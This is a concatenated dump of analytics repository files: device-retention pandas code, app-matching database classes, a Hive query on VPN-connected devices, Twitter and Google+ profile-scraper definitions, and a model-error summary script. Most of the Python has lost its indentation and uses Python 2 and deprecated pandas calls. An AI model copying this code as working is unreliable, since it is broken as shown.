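#                      'active_date': ['2015-05-01', '2015-05-02', '2015-05-01']})
#   construct_feature_matrix(df, 'active_date')
# yields a device_id x active_date matrix with 1 where the device was active on
# that date and 0 elsewhere.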
def calc_ratio_per_day(row):
    """Divide all retention counts in a row by the row's new_devices, keeping
    the new_devices and first_active_date fields intact."""
new_devices = row['new_devices']
first_active_date = row['first_active_date']
row['new_devices'] = 1
row['first_active_date'] = 1
row = row / new_devices
row['new_devices'] = new_devices
row['first_active_date'] = first_active_date
return row
def retention_matrix_shaper(df):
# move new_device to front
new_devices = df['new_devices']
df.drop(labels=['new_devices'], axis=1,inplace = True)
df.insert(0, 'new_devices', new_devices)
# remove NaN, shift cols left
c = count()
new_devices = df['new_devices']
first_active_date = df['first_active_date']
df = df.apply(lambda x: x.shift(-c.next() + 1), 1)
df.drop(labels=['new_devices'], axis=1,inplace = True)
df.drop(labels=['first_active_date'], axis=1,inplace = True)
df.insert(0, 'new_devices', new_devices)
df.insert(0, 'first_active_date', first_active_date)
df.reset_index(inplace=True)
return df
def mask_generator(mask, activity_matrix):
# generate masks, mask has length equal to number of dates, num masks
mask_length = mask.shape[0]
row_length = activity_matrix.shape[1]
zeroes_array = np.zeros(row_length, dtype=np.int)
num_mask = row_length - mask_length + 1
result_mask = np.array([], dtype=np.int)
mask_range = range(1, 1 + num_mask)
for n in mask_range:
row = np.append(zeroes_array[0:n-1], mask)
row = np.append(row, zeroes_array[0:row_length - n + 1 - mask_length])
result_mask = np.append(result_mask, row)
return result_mask.reshape(num_mask, row_length)
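# Example (a sketch with a short mask): for mask [1, 1, 0] against a 4-column
# activity matrix, mask_generator returns every alignment of the mask along the
# date axis:
#   [[1, 1, 0, 0],
#    [0, 1, 1, 0]]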
def calculate_retention_au(df, platform_device_list):
"""
Function that calculates a retention matrix for active devices
:param df: dataframe containing information on active devices as retrieved by EMR query 'ad_device_retention.sql'
:param platform_device_list: a list of platforms and devices for which to make a retention matrix
:return: a dataframe
"""
for pdl in platform_device_list:
if (pdl == 'iOS'):
pdl_df = df[(df['platform'] == 'iOS') & (df['first_active_date'] >= '2014-10-23')]
if (pdl == 'iPhone'):
pdl_df = df[(df['platform'] == 'iOS') & (df['type'] == 'Smartphone') & (df['first_active_date'] >= '2014-10-23')]
if (pdl == 'iPad'):
pdl_df = df[(df['platform'] == 'iOS') & (df['type'] == 'Tablet') & (df['first_active_date'] >= '2014-10-23')]
if (pdl == 'Android'):
pdl_df = df[(df['platform'] == 'Android') & (df['first_active_date'] >= '2014-12-18')]
unique_devices = pdl_df['device_id'].unique().tolist()
pdl_df_unique_devices = pdl_df[pdl_df.device_id.isin(unique_devices)]
# group by active_date an device_id to determine activity
grouped_date_device = pdl_df_unique_devices.groupby(by=['active_date', 'device_id']).count()
grouped_date_device.reset_index(inplace=True)
grouped_date_device = grouped_date_device[['active_date', 'device_id', 'first_active_date']]
# group by device_id and first_active_date to determine first_active_date
grouped_fa_date_device = pdl_df_unique_devices.groupby(by=['device_id', 'first_active_date']).count()
grouped_fa_date_device.reset_index(inplace=True)
grouped_fa_date_device = grouped_fa_date_device[['device_id', 'first_active_date']]
# construct NxM matrix for N devices and M dates
device_date_activity = construct_feature_matrix(grouped_date_device, 'active_date')
device_date_activity_matrix = device_date_activity.as_matrix()
# generate 'masks' for previous and subsequent days
prev_mask_format = np.array([1,1,1,1,1,1,1,0,0,0,0], dtype=np.int)
prev_mask = mask_generator(prev_mask_format, device_date_activity_matrix)
sub_mask_format = np.array([0,0,0,0,0,0,0,0,1,1,1], dtype=np.int)
sub_mask = mask_generator(sub_mask_format, device_date_activity_matrix)
# apply masks to device_activity matrix & sum both matrices
prev_activity_matrix = device_date_activity_matrix.dot(prev_mask.T)
sub_activity_matrix = device_date_activity_matrix.dot(sub_mask.T)
prev_activity_matrix = prev_activity_matrix > 0
sub_activity_matrix = sub_activity_matrix > 0
masked_activity_matrix = prev_activity_matrix & sub_activity_matrix
# select appropriate dates as columns
date_columns = device_date_activity.columns.tolist()
retention_dates = date_columns[3:device_date_activity_matrix.shape[1]-7]
retention_df = pd.DataFrame(data=masked_activity_matrix, index=device_date_activity.index, columns=retention_dates)
retention_df = retention_df[retention_df == True]
# introduce startdate again
        retention_df_startdate = grouped_fa_date_device.merge(retention_df, left_on='device_id', right_index=True)
# sum all devices per startdate
retention_df_startdate['new_devices'] = 1
retention_per_startdate = retention_df_startdate.groupby(by='first_active_date').sum()
retention_per_startdate.reset_index(inplace=True)
# rearrange structure of matrix
shaped_retention_matrix = retention_matrix_shaper(retention_per_startdate)
# calculate retention
        shaped_retention_matrix = shaped_retention_matrix.apply(calc_ratio_per_day, axis=1)
return shaped_retention_matrix, retention_per_startdate
def create_weekly_retention_matrix(weekly_devices, all_devices):
"""
Function that creates a weekly retention matrix using:
* 'weekly_devices' which is the weekly active devices as exported every week
    * 'all_devices' which are the active devices as retrieved by EMR query 'ad_device_retention.sql'
    :param weekly_devices: dataframe containing information on weekly active devices
    :param all_devices: dataframe containing information on daily active devices
:return: a dataframe containing a weekly retention matrix
"""
# create weekly retention matrix
weekly_retention = all_devices.merge(weekly_devices, on='device_id', how='left')
weekly_retention['dummy'] = 1
weekly_retention = weekly_retention.pivot_table(values = 'dummy', index='device_id', columns='end_date', fill_value=0)
weekly_retention.reset_index(inplace=True)
# merge with 'first_week_date'
weekly_retention = all_devices[['device_id', 'first_week_date']].merge(weekly_retention, on='device_id', how='left')
weekly_retention.fillna(value=0, inplace=True)
fad = weekly_retention.first_week_date
weekly_retention.drop(labels = 'first_week_date', axis=1, inplace=True)
weekly_retention.insert(1,'first_week_date', fad)
weekly_retention.sort(columns='first_week_date', inplace=True)
return weekly_retention
def plot_weekly_active_devices(weekly_devices, first_active_dates):
# number of devices that contribute to the sample, create weekly retention matrix based on all devices
weekly_retention = create_weekly_retention_matrix(weekly_devices, first_active_dates)
    # calculate proportion of devices which contribute to the sample per week that they joined the sample
mean_retention = weekly_retention.groupby('first_week_date').mean()
mean_retention.reset_index(inplace=True)
# calculate device influx per week, add to mean retention
devices_per_week = weekly_retention[['device_id','first_week_date']].groupby('first_week_date').count()
devices_per_week.reset_index(inplace=True)
devices_per_week.rename(columns={'device_id':'device_influx'}, inplace=True)
mean_retention = mean_retention.merge(devices_per_week, on='first_week_date')
    # see which columns represent weeks, iterate over weeks to see contribution per week, plot
weeks = mean_retention.columns.values.tolist()
weeks.remove('first_week_date')
weeks.remove('device_influx')
device_contribution_over_weeks = pd.DataFrame()
for i, w in enumerate(weeks):
new_row = [[weeks[i], mean_retention[w].mul(mean_retention.device_influx, axis=0).sum()]]
new_df = pd.DataFrame(data=new_row, columns= ['week', 'contributing_devices'])
device_contribution_over_weeks = device_contribution_over_weeks.append(new_df)
    plt.ioff()
    ax = device_contribution_over_weeks.plot(x='week', y='contributing_devices', figsize=(15,8))
    fig = ax.get_figure()
plt.xlabel('date')
plt.ylabel('Number of devices')
plt.title('Number of devices contributing to weekly estimates')
return mean_retention, device_contribution_over_weeks,fig
def plot_age_gender_contribution(avg_retention_per_week, probabilities, weekly_devices, all_devices):
# calculate weekly retention
weekly_retention = create_weekly_retention_matrix(weekly_devices, all_devices)
# do the same, but use age gender probabilities now to see who is contributing
# use latest age/gender estimate per device
age_gender_col = ['female,old','female,young', 'male,old', 'male,young']
probability_columns = ['device_id'] + age_gender_col
    # see which columns represent weeks, iterate over weeks to see contribution per week, plot
weeks = avg_retention_per_week.columns.values.tolist()
to_remove = ['first_week_date', 'device_influx'] + age_gender_col
for w in weeks:
if w in to_remove:
weeks.remove(w)
age_gender_contribution_over_weeks = pd.DataFrame()
for i, w in enumerate(weeks):
        used_probabilities = probabilities[probability_columns][probabilities.end_date == w]
        age_gender_retention = weekly_retention.merge(used_probabilities, on='device_id')
age_gender_retention.columns = ['device_id', 'first_week_date'] + weeks + age_gender_col
fo = age_gender_retention[w].mul(age_gender_retention['female,old'], axis=0).sum()
fy = age_gender_retention[w].mul(age_gender_retention['female,young'], axis=0).sum()
mo = age_gender_retention[w].mul(age_gender_retention['male,old'], axis=0).sum()
my = age_gender_retention[w].mul(age_gender_retention['male,young'], axis=0).sum()
new_row = [[weeks[i], fo, fy, mo, my]]
new_df = pd.DataFrame(data=new_row, columns= ['week'] + age_gender_col)
age_gender_contribution_over_weeks = age_gender_contribution_over_weeks.append(new_df)
pct_col = ['% female,old','% female,young', '% male,old', '% male,young']
age_gender_contribution_over_weeks['total_devices'] = age_gender_contribution_over_weeks[age_gender_col].sum(axis=1)
age_gender_contribution_over_weeks[pct_col] = age_gender_contribution_over_weeks[age_gender_col].divide(age_gender_contribution_over_weeks.total_devices,axis=0) * 100
plt.ioff()
age_gender_absolute = age_gender_contribution_over_weeks.plot(x='week', y=age_gender_col, figsize=(15,7))
plt.ylabel('Number of devices')
plt.xlabel('Date')
plt.legend()
plt.title('Absolute weekly contribution per estimated age / gender')
age_gender_percentage = age_gender_contribution_over_weeks.plot(x='week', y=pct_col, figsize=(15,7))
plt.ylabel('Percentage of devices')
plt.xlabel('Date')
plt.legend()
    plt.title('Percentage weekly contribution per estimated age / gender')
return age_gender_contribution_over_weeks.tail(),age_gender_absolute, age_gender_percentage
def plot_nth_week_age_gender_retention(probabilities, weekly_sample_devices, n):
"""
:param probabilities: dataframe containing estimated age gender probabilities per week
    :param weekly_sample_devices: dataframe containing weekly active devices
    :param n: nth week retention, 1st week is indexed to 100%
    :return: matplotlib figure with the nth-week retention per estimated age/gender bucket
"""
probabilities_copy = probabilities.copy()
weekly_sample_devices_copy = weekly_sample_devices.copy()
age_bins = ['female,old','female,young','male,old','male,young']
probabilities_copy.end_date = probabilities_copy.end_date.apply(lambda x: x.strftime("%Y-%m-%d"))
weekly_sample_devices_copy.end_date = weekly_sample_devices_copy.end_date.apply(lambda x: x.strftime("%Y-%m-%d"))
# create weekly retention matrix
ag_retention = weekly_sample_devices_copy.merge(probabilities_copy[['device_id','end_date'] + age_bins], on=['device_id','end_date'])
result = pd.DataFrame()
# determine the first week that an device was active
min_date_per_device = ag_retention[['device_id','end_date']].groupby('device_id').min()
min_date_per_device.reset_index(inplace=True)
for i, a in enumerate(age_bins):
print i,a
# determine per device in which week they were active
ag_pivot = ag_retention.pivot_table(values = a, index='device_id', columns='end_date')
weeks = ag_retention.end_date.unique().tolist()
ag_pivot.reset_index(inplace=True)
ag_first_date = ag_pivot.merge(min_date_per_device, on=['device_id'])
ag_first_date_summed = ag_first_date.groupby('end_date').sum()
ag_first_date_summed.reset_index(inplace=True)
c = count()
ag_first_date_summed[weeks] = ag_first_date_summed[weeks].apply(lambda x: x.shift(-c.next() + 1), 1)
ag_first_date_summed['age_bin'] = a
week_numbers = range(1, len(ag_first_date_summed.columns.values.tolist())-1,1)
ag_first_date_summed.columns = ['first_week_date'] + week_numbers + ['age_bin']
ag_first_date_summed[week_numbers[0:]] = ag_first_date_summed[week_numbers[0:]].divide(ag_first_date_summed[1], axis=0)
result = result.append(ag_first_date_summed)
fig = plt.figure(figsize=(15,8))
for key, grp in result.groupby('age_bin'):
plt.plot(grp.index, grp[n]*100)
plt.xticks(grp.index, grp.first_week_date, rotation=45)
plt.xlabel('Week')
plt.ylabel('Retention percentage')
plt.title('Retention for estimated age gender over time')
plt.legend(age_bins)
return fig<file_sep>/exact-matching-improvement/icon_lib/database_interface.py
import config
import MySQLdb
import os
import pandas as pd
import psycopg2
from queries import app_annie_queries, distimo_queries
class DatabaseInterface():
"""
Class defining interactions with the database.
"""
def query_all_matches(self):
raise NotImplementedError("Method not implemented.")
def query_app_info(self):
raise NotImplementedError("Method not implemented.")
def query_matched_apps(self):
raise NotImplementedError("Method not implemented.")
class DistimoDatabase(DatabaseInterface):
"""
Class to interface with Distimo's database.
:param connection: Connection object to MySQL database
:param db_parameters: Dictionary with DB parameters used when calling Mysqldb.connect() if no connection is given
"""
def __init__(self, connection=None, db_parameters=config.DISTIMO_DB_PARAMETERS):
if connection is None:
self.connection = MySQLdb.connect(**db_parameters)
else:
self.connection = connection
def query_all_matches(self):
"""
Query all matches.
:return: All matches DataFrame with columns from_market, from_app_id, to_market, to_app_id
:rtype: pd.DataFrame
"""
return pd.read_sql(distimo_queries['matches'], self.connection)
def query_app_info(self):
"""
Query app info.
:return: App info DataFrame with columns market, app_id, name and publisher
:rtype: pd.DataFrame
"""
return pd.read_sql(distimo_queries['app_info'], self.connection)
def query_matched_apps(self):
"""
Query matched apps
:return: Matched apps DataFrame with columns market, app_id and icon_url
:rtype: pd.DataFrame
"""
return pd.read_sql_query(distimo_queries['matched_app_query'], self.connection)
class AppAnnieDatabase(DatabaseInterface):
"""
Class to interface with AppAnnie's databases.
    :param aa_connection: Connection object to the aa Postgres database
    :param aa_android_connection: Connection object to the aa_android Postgres database
    :param db_parameters: Dictionary with DB parameters used when calling psycopg2.connect() if no connections are given
"""
def __init__(self, aa_connection=None, aa_android_connection=None, db_parameters=config.APPANNIE_DB_PARAMETERS):
self.db_parameters = db_parameters
if aa_connection is None or aa_android_connection is None:
aa_parameters = db_parameters.copy()
aa_parameters['database'] = 'aa'
self.aa_connection = psycopg2.connect(**aa_parameters)
aa_android_parameters = db_parameters.copy()
aa_android_parameters['database'] = 'aa_android'
self.aa_android_connection = psycopg2.connect(**aa_android_parameters)
else:
self.aa_connection = aa_connection
self.aa_android_connection = aa_android_connection
self._create_db_link_from_aa_to_aa_android(self.db_parameters)
def query_all_matches(self):
"""
Query all matches.
:return: All matches DataFrame with columns from_market, from_app_id, to_market, to_app_id
:rtype: pd.DataFrame
"""
return pd.read_sql(app_annie_queries['matches'], self.aa_connection)
def query_app_info(self):
"""
Query app info.
:return: App info DataFrame with columns market, app_id, name and publisher
:rtype: pd.DataFrame
"""
android_info = self._query_android_info()
ios_info = self._query_ios_info()
return pd.concat([android_info, ios_info], axis=0, ignore_index=True)
def query_matched_apps(self):
"""
Query matched apps
:return: Matched apps DataFrame with columns market, app_id and icon_url
:rtype: pd.DataFrame
"""
matched_android_apps = self._query_android_matched_apps()
matched_ios_apps = self._query_ios_matched_apps()
matched_apps = pd.concat([matched_android_apps, matched_ios_apps], axis=0, ignore_index=True)
check_icon_paths = lambda x: os.path.exists('icons/' + x.market + '/' + str(x.app_id))
icon_is_scraped = matched_apps.apply(check_icon_paths, axis=1)
valid_matched_apps = matched_apps.ix[icon_is_scraped].reset_index(drop=True)
return valid_matched_apps[['app_id', 'market', 'icon_url', 'name']]
def _create_db_link_from_aa_to_aa_android(self, db_parameters):
"""
Create a DBlink to the aa database from the aa_android database.
        :param db_parameters: Dictionary with DB parameters (user, host, password) used in the dblink connection string
:return: None
"""
android_cursor = self.aa_android_connection.cursor()
db_link_query = app_annie_queries['dblink_aa_to_aa_android'].format(user=db_parameters['user'],
host=db_parameters['host'],
password=db_parameters['password'])
android_cursor.execute(db_link_query)
def _query_android_info(self):
"""
Query app info for Android apps.
:return: App info DataFrame with columns market, app_id, name and publisher
:rtype: pd.DataFrame
"""
return pd.read_sql(app_annie_queries['app_info_android'], self.aa_android_connection)
def _query_ios_info(self):
"""
Query app info for iOS apps.
:return: App info DataFrame with columns market, app_id, name and publisher
:rtype: pd.DataFrame
"""
return pd.read_sql(app_annie_queries['app_info_ios'], self.aa_connection)
def _query_android_matched_apps(self):
"""
Query matched Android apps.
:return: Matched Android apps DataFrame
"""
matched_android_apps = pd.read_sql(app_annie_queries['matched_app_android'], self.aa_android_connection)
matched_android_apps['icon_url'] = self._set_android_icon_size(matched_android_apps)
matched_android_apps.dropna(axis=0, inplace=True)
matched_android_apps = self._remove_invalid_icon_urls(matched_android_apps, '64')
return matched_android_apps
def _set_android_icon_size(self, matched_android_apps):
"""
Change the sizes in Android urls.
:param matched_android_apps: Matched Android apps DataFrame
:return: Series with changed url
"""
return matched_android_apps.icon_url.str.replace('=w\d*', '=w64')
def _remove_invalid_icon_urls(self, matched_apps, valid_size_ending):
"""
Remove all apps with icon url with invalid endings.
:param matched_apps: DataFrame with matched iOS apps
:param valid_size_ending: String with valid size ending (e.g. '64' or '64.png')
:returns: DataFrame with only valid sizes
"""
has_valid_sizes = matched_apps.icon_url.str.endswith(valid_size_ending)
matched_apps = matched_apps[has_valid_sizes].reset_index(drop=True)
return matched_apps
def _query_ios_matched_apps(self):
"""
Query matched iOS apps.
:return: Matched iOS apps DataFrame
"""
matched_ios_apps = pd.read_sql_query(app_annie_queries['matched_app_ios'], self.aa_connection)
matched_ios_apps['icon_url'] = self._clean_ios_icon_url(matched_ios_apps)
matched_ios_apps.dropna(axis=0, inplace=True)
matched_ios_apps = self._remove_invalid_icon_urls(matched_ios_apps, '64.png')
return matched_ios_apps
def _clean_ios_icon_url(self, matched_ios_apps):
"""
Clean the size for the iOS url.
:param matched_ios_apps: DataFrame with matched iOS apps
        :return: Series with cleaned icon urls
"""
right_size = matched_ios_apps.icon_url.str.replace('icon\d*x\d*.',
'icon64x64.')
right_size = right_size.str.replace('icon_\d*.', 'icon_64.')
return right_size.str.replace('.(jpg|jpeg)', '.png').values
class LocalFiles(DatabaseInterface):
"""
Class to interface with local files.
"""
def __init__(self, all_matches_path='data/csv/all_matches.csv', app_info_path='data/csv/app_info.csv',
matched_apps_path='data/csv/matched_apps.csv'):
self.all_matches = pd.DataFrame.from_csv(all_matches_path, index_col=False)
self.app_info = pd.DataFrame.from_csv(app_info_path, index_col=False)
self.matched_apps = pd.DataFrame.from_csv(matched_apps_path, index_col=False)
def query_all_matches(self):
"""
Query all matches.
:return: All matches DataFrame with columns from_market, from_app_id, to_market, to_app_id
:rtype: pd.DataFrame
"""
return self.all_matches
def query_app_info(self):
"""
Query app info.
:return: App info DataFrame with columns market, app_id, name and publisher
:rtype: pd.DataFrame
"""
return self.app_info
def query_matched_apps(self):
"""
Query matched apps
:return: Matched apps DataFrame with columns market, app_id and icon_url
:rtype: pd.DataFrame
"""
check_icon_paths = lambda x: os.path.exists('icons/' + x.market + '/' + str(x.app_id))
icon_is_scraped = self.matched_apps.apply(check_icon_paths, axis=1)
icon_is_invalid = (self.matched_apps.market == 'gp') & ~self.matched_apps.icon_url.str.endswith('64')
return self.matched_apps.ix[icon_is_scraped & ~icon_is_invalid].reset_index(drop=True)<file_sep>/aa_au_model/hive_ql/conversion_allVPN_active.sql
set hive.auto.convert.join = true;
set hive.exec.dynamic.partition = true;
set start_date = '2015-05-03';
set end_date = '2015-05-09';
-- Get all devices connected to VPN
drop table if exists connected_devices;
create table connected_devices
as
select
distinct device_id
from
vpn_sample_data_connection_session
where
datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
;
-- Get unique iOS devices
drop table if exists ios_devices;
create table ios_devices
as
select
device_id
from
vpn_new_device_info
where
platform = 'iOS'
and type in ('Smartphone', 'Tablet')
group by
device_id
;
-- Get iOS devices connected to VPN during the selected week
drop table if exists connected_devices_ios;
create table connected_devices_ios
as
select
ios.device_id
from
ios_devices ios
join connected_devices connected
on ios.device_id = connected.device_id
;
-- Select devices that are active for the selected week
drop table if exists period_active_weekly;
create table period_active_weekly
as
select
x.datestr as end_period_date,
x.device_id
from (
select
active.datestr,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
usage_model_selected_device_timezone_weekly active
group by
active.datestr,
active.device_id
having
cast(count(distinct(active.date)) as int) = 7
) x
;
drop table if exists active_devices;
create table active_devices
as
select
device_id
from
period_active_weekly
where
end_period_date = ${hiveconf:end_date}
;
-- Get iOS devices connected to VPN that are also active for the selected week
drop table if exists active_devices_ios;
create table active_devices_ios
as
select
active.device_id
from
connected_devices_ios connected
join active_devices active
on connected.device_id = active.device_id
;
-- Get ratio active devices / connected devices
select
active.count,
connected.count,
round(active.count / connected.count * 100, 1)
from (
select
count(*) as count
from
active_devices_ios
) active
JOIN
(
select
count(*) as count
from
connected_devices_ios
) connected
;
<file_sep>/audience/twitter-scraping/lib/scraper/scraper/items.py
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class ScraperItem(scrapy.Item):
name = scrapy.Field()
account_name = scrapy.Field()
bio = scrapy.Field()
location = scrapy.Field()
join_date = scrapy.Field()
homepage = scrapy.Field()
n_tweets = scrapy.Field()
n_following = scrapy.Field()
n_followers = scrapy.Field()
n_favorites = scrapy.Field()
n_lists = scrapy.Field()<file_sep>/audience/google-plus-scraping/lib/scraper/scraper/constants.py
SCRAPE_ACCOUNT = {'Email': '<EMAIL>',
'Passwd': '<PASSWORD>'}
DIV_PATHS = {'account_name': "//div[@guidedhelpid='profile_name']/text()",
'basic_information': "//div[@id=11]//div[contains(@class, 'wna DVb')]",
'basic_information_keys': "//div[contains(@class, 'E9a G9a Rqc')]/text()",
'basic_information_values': "//div[contains(@class, 'y4 G9a')]/text()",
'apps_signin': "//div[@id=27]//ul[contains(@class, 'Kla yVa')]",
'apps_signin_values': "//a[contains(@class, 'OLa ob url')]/text()",
'in_circles': "//div[@id=24]//div[contains(@class, 'ikb')]",
'in_circles_values': "//a[contains(@class, 'ob Jk')]/@href",
'education': "//div[@id=9]//li[contains(@class, 'UZa')]",
'school_names': "//div[contains(@class, 'PLa')]/text()",
'work': "//div[@id=8]//div[contains(@class, 'wna')]",
'places': "//div[@id=12]//div[contains(@class, 'AAa')]"}
<file_sep>/publisher_cv/gen_model_compare_summary_v2.py
##
# model python version 2
# Department: Data Science
# Author: <NAME>
# Created: Sept 26, 2013
# Description: compare the models of version `ver` with v8 and generate the final summary
#
##
import pandas as pd
import numpy as np
#import matplotlib.pyplot as plt
import os
#import config
def analyze_results(df):
describe = []
df2 = []
df = df.dropna(subset=['actual'])
for n, g in df.groupby(['store_id', 'feed_id', 'category_id', 'date']):
g = g.sort('actual', ascending=False)
g['analytics_range'] = '201 to end'
g['analytics_range'][:200] = '21 to 200'
g['analytics_range'][:20] = '11 to 20'
g['analytics_range'][:10] = '1 to 10'
g['analytics_wt'] = 0.1
g['analytics_wt'][:200] = 0.5
g['analytics_wt'][:20] = 0.9
g['analytics_wt'][:10] = 1.0
df2.append(g)
df = pd.concat(df2)
del df2
df.to_csv('%s/error_source_%s.csv'%(plot_dir, store_id))
for n, g in df.groupby(['store_id', 'feed_id', 'category_id', 'date', 'analytics_range']):
t_under_20 = []
t_under_20.append(float(g[g['sbe_rel_error']<=0.2].shape[0])/g.shape[0])
t_under_20.append(float(g[g['tae_rel_error']<=0.2].shape[0])/g.shape[0])
t_under_20.append(float(g[g['tae_scored_rel_error']<=0.2].shape[0])/g.shape[0])
t_under_20.append(float(g[g['t12e_7d_rel_error']<=0.2].shape[0])/g.shape[0])
d = g[['store_id', 'feed_id', 'date', 'category_id', 'actual', 'analytics_range', 'analytics_wt', 'mkt_size', 'sbe_rel_error', 'tae_rel_error', 'tae_scored_rel_error', 't12e_7d_rel_error']].describe()
t_under_20_max = np.max(t_under_20)
s = pd.Series()
s.name = '%_apps_under_20%_error'
d = d.append(s)
s = pd.Series()
s.name = 'best_case'
d = d.append(s)
d['sbe_rel_error']['%_apps_under_20%_error'] = t_under_20[0]
d['tae_rel_error']['%_apps_under_20%_error'] = t_under_20[1]
d['tae_scored_rel_error']['%_apps_under_20%_error'] = t_under_20[2]
d['t12e_7d_rel_error']['%_apps_under_20%_error'] = t_under_20[3]
d['sbe_rel_error']['best_case'] = 1 if t_under_20[0]==t_under_20_max else 0
d['tae_rel_error']['best_case'] = 1 if t_under_20[1]==t_under_20_max else 0
d['tae_scored_rel_error']['best_case'] = 1 if t_under_20[2]==t_under_20_max else 0
d['t12e_7d_rel_error']['best_case'] = 1 if t_under_20[3]==t_under_20_max else 0
if d[['sbe_rel_error', 'tae_rel_error', 'tae_scored_rel_error', 't12e_7d_rel_error']]['best_case':'best_case'].values.sum() > 1:
#min_error = d[['sbe_rel_error', 'scored_sbe_rel_error', 'loginv_sbe_rel_error', 'loginv_scored_sbe_rel_error']]['mean':'mean'].values.min()
min_error = []
min_error.append(d['sbe_rel_error']['mean'] if d['sbe_rel_error']['best_case']==1 else 1000.0)
min_error.append(d['tae_rel_error']['mean'] if d['tae_rel_error']['best_case']==1 else 1000.0)
min_error.append(d['tae_scored_rel_error']['mean'] if d['tae_scored_rel_error']['best_case']==1 else 1000.0)
min_error.append(d['t12e_7d_rel_error']['mean'] if d['t12e_7d_rel_error']['best_case']==1 else 1000.0)
min_error = np.min(min_error)
d['sbe_rel_error']['best_case'] = 1 if (d['sbe_rel_error']['best_case']==1 and d['sbe_rel_error']['mean']==min_error) else 0
d['tae_rel_error']['best_case'] = 1 if (d['tae_rel_error']['best_case']==1 and d['tae_rel_error']['mean']==min_error) else 0
d['tae_scored_rel_error']['best_case'] = 1 if (d['tae_scored_rel_error']['best_case']== 1 and d['tae_scored_rel_error']['mean']==min_error) else 0
d['t12e_7d_rel_error']['best_case'] = 1 if (d['t12e_7d_rel_error']['best_case']==1 and d['t12e_7d_rel_error']['mean']==min_error) else 0
d['store_id'] = n[0]
d['feed_id'] = n[1]
d['category_id'] = n[2]
d['date'] = n[3]
d['analytics_range'] = n[4]
describe.append(d)
describe = pd.concat(describe)
return describe
def process_df(df):
#df = df[df['index']=='best_case']
df = df[df['index']=='mean']
#df = df.groupby(['store_id', 'feed_id', 'category_id', 'range']).sum().reset_index()
df['sbe_rel_error'] = np.round(df['sbe_rel_error'], 4)
df['tae_rel_error'] = np.round(df['tae_rel_error'], 4)
df['tae_scored_rel_error'] = np.round(df['tae_scored_rel_error'], 4)
df['t12e_7d_rel_error'] = np.round(df['t12e_7d_rel_error'], 4)
df['sbe_final_score'] = df['mkt_size'] * df['analytics_wt']/ (np.exp(df['sbe_rel_error']))
df['tae_final_score'] = df['mkt_size'] * df['analytics_wt']/(np.exp(df['tae_rel_error']))
df['tae_scored_final_score'] = df['mkt_size'] * df['analytics_wt']/(np.exp(df['tae_scored_rel_error']))
df['t12e_7d_final_score'] = df['mkt_size'] * df['analytics_wt']/(np.exp(df['t12e_7d_rel_error']))
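    # Worked example (made-up numbers): with mkt_size = 1000, analytics_wt = 0.5
    # and a mean relative error of 0.2, the score is 1000 * 0.5 / exp(0.2) ~ 409.4;
    # lower errors in larger, more heavily weighted segments score higher.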
return df
def main():
global store_id
global plot_dir
global ver
ver = 'v1' ## model to be compared with v8
res_dir = '/Users/perezrafael/appannie/data/estimates_public_companies'
plot_dir = 'LogInv_Compare_Summary'
filelist= []
store_ids = set()
for root, dirs, files in os.walk(res_dir):
for file in files:
#if file.endswith(".csv.bz2") and '143441' in file:
if file.endswith(".csv") and ver in file and 'res_' in file and 'stg' not in file:
filepath = os.path.join(root, file)
filelist.append(file)
store_ids.add(file.split('_')[1])
#store_ids.clear()
#store_ids.add('143491')
if True:
for i in sorted(list(store_ids)):
store_id = i
print '======== country',store_id
filepath_v8 = '%s/res_%s_v1.csv'%(res_dir, store_id)
#filepath_7d = '%s/res_%s_%s.csv'%(res_dir, store_id, ver)
filepath_stg = '%s/res_stg_%s_v1.csv'%(res_dir, store_id)
gres_v8 = pd.read_csv(filepath_v8)
#gres_7d = pd.read_csv(filepath_7d)
gres_stg = pd.read_csv(filepath_stg)
gres_v8 = gres_v8[['store_id', 'date', 'app_id', 'feed_id', 'actual', 'Daily.Estimate', 'tae']]
            gres_v8 = gres_v8[gres_v8['Daily.Estimate'] != float('Inf')]
            gres_v8 = gres_v8[gres_v8['tae'] != float('Inf')]
            #gres_v8 = gres_v8[gres_v8['tae_scored'] != float('Inf')]
gres_stg = gres_stg[['store_id', 'date', 'app_id', 'feed_id', 'category_id', 'iphone_rank', 'ipad_rank']]
#gres_stg.rename(columns={'tae': 'cat_est'}, inplace=True)
df_plot = gres_stg.merge(gres_v8, on=['store_id', 'app_id', 'date', 'feed_id'], how='left')
mkt = df_plot[['store_id', 'feed_id', 'category_id', 'date', 'tae']].groupby(['store_id', 'feed_id', 'category_id', 'date']).sum().reset_index()
mkt.rename(columns={'tae': 'mkt_size'}, inplace=True)
#gres_7d = gres_7d[['store_id', 'date', 'app_id', 'feed_id', 'tae_scored']]
#gres_7d.rename(columns={'tae_scored': 'tae_scored_7d'}, inplace=True)
#df_plot = df_plot.merge(gres_7d, on=['store_id', 'app_id', 'date', 'feed_id'], how='left')
df_plot = df_plot.dropna(subset = ['actual'])
df_plot['sbe_rel_error'] = (df_plot['Daily.Estimate'] - df_plot['actual']).abs()*1.0/df_plot['actual']
df_plot['tae_rel_error'] = (df_plot['tae'] - df_plot['actual']).abs()*1.0/df_plot['actual']
df_plot['tae_scored_rel_error'] = (df_plot['tae'] - df_plot['actual']).abs()*1.0/df_plot['actual']
df_plot['t12e_7d_rel_error'] = (df_plot['tae'] - df_plot['actual']).abs()*1.0/df_plot['actual']
df_plot = df_plot.merge(mkt, on=['store_id', 'date', 'category_id', 'feed_id'], how='left')
#gres = gres.dropna(subset=[['tae', 't12e_r']])
describe = analyze_results(df_plot)
describe.to_csv('%s/error_describe_%s.csv'%(plot_dir, store_id))
print('Generating final summary')
result= []
for root, dirs, files in os.walk(plot_dir):
for file in files:
f = file.split('_')
if file.endswith(".csv") and 'error_describe' in file:
filepath = os.path.join(root, file)
df = pd.read_csv(filepath)
df['index'] = df['Unnamed: 0']
del df['Unnamed: 0']
df = process_df(df)
result.append(df)
result = pd.concat(result)
result.to_csv('%s/final_summary.csv'%(plot_dir), index=False)
print('Done == ')
pass
if __name__ == '__main__':
main()
<file_sep>/int-vs-m-benchmark/sql/android/1001d2-prepare_application_data-remove_known_preinstalls.sql
/*
Set real_value of known preinstalls to preinstalled_value, effectively
removing them from the estimation procedure. The known preinstalls
are removed globally.
Note that this is a very greedy approach: preinstalled apps are often
device-, country- and carrier-specific. For instance, Cut the Rope seemed
to be bundled with the Samsung Galaxy S5 in the US but was not installed on a
phone in the Netherlands.
